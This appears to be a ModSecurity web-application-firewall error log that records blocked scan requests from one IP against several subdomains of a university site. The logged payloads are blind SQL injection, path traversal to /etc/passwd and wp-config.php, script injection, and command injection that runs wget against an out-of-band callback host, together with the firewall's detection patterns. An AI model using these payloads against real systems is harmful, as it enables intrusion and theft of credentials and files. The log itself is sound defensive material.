[Tue Aug 29 11:41:36.623873 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO13AMCo-f0AAAc0NjkAAAAM"]
[Tue Aug 29 11:41:37.388072 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AcCo-f0AAAUKhKEAAABC"]
[Tue Aug 29 11:41:37.393074 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AcCo-f0AAAcqJQ8AAAAG"]
[Tue Aug 29 11:41:38.389445 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAc0NkIAAAAM"]
[Tue Aug 29 11:41:38.391576 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAc8A2gAAAAK"]
[Tue Aug 29 11:41:38.404317 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAXHqD4AAAAT"]
[Tue Aug 29 11:41:38.411362 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAaZ9vwAAAAo"]
[Tue Aug 29 11:41:39.375873 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAc0NkUAAAAM"]
[Tue Aug 29 11:41:39.388074 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAc8A2wAAAAK"]
[Tue Aug 29 11:41:39.395953 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAcbSLQAAAAv"]
[Tue Aug 29 11:41:39.413105 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAcqJRMAAAAG"]
[Tue Aug 29 11:41:39.436187 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13A8Co-f0AAAcoNbMAAAAF"]
[Tue Aug 29 11:41:39.501361 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAQSWsAAAAA0"]
[Tue Aug 29 11:41:39.507035 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13A8Co-f0AAAaZ9wMAAAAo"]
[Tue Aug 29 11:41:40.440960 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13BMCo-f0AAAQSWsMAAAA0"]
[Tue Aug 29 11:41:40.447010 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcqJRYAAAAG"]
[Tue Aug 29 11:41:40.489536 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcqJRcAAAAG"]
[Tue Aug 29 11:41:40.512720 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAUKhK8AAABC"]
[Tue Aug 29 11:41:40.515138 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcqJRgAAAAG"]
[Tue Aug 29 11:41:40.528112 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcoNbkAAAAF"]
[Tue Aug 29 11:41:41.988730 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BcCo-f0AAAc0Nk8AAAAM"]
[Tue Aug 29 11:41:42.699374 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAUKhMMAAABC"]
[Tue Aug 29 11:41:42.896729 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAUKhMwAAABC"]
[Tue Aug 29 11:41:42.896729 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcoNcsAAAAF"]
[Tue Aug 29 11:41:42.908517 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAc8A4sAAAAK"]
[Tue Aug 29 11:41:42.916436 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAcoNcwAAAAF"]
[Tue Aug 29 11:41:43.786451 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13B8Co-f0AAAUKhNsAAABC"]
[Tue Aug 29 11:41:45.392399 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26g1pqb47tahd7iu.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAQkBiUAAAAC"]
[Tue Aug 29 11:41:45.435135 2023] [:error] [pid 1859] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gdsqsbtynr1mys.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdDO1gAAAAV"]
[Tue Aug 29 11:41:45.441209 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26g3551a35pmoopu.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAc8A5QAAAAK"]
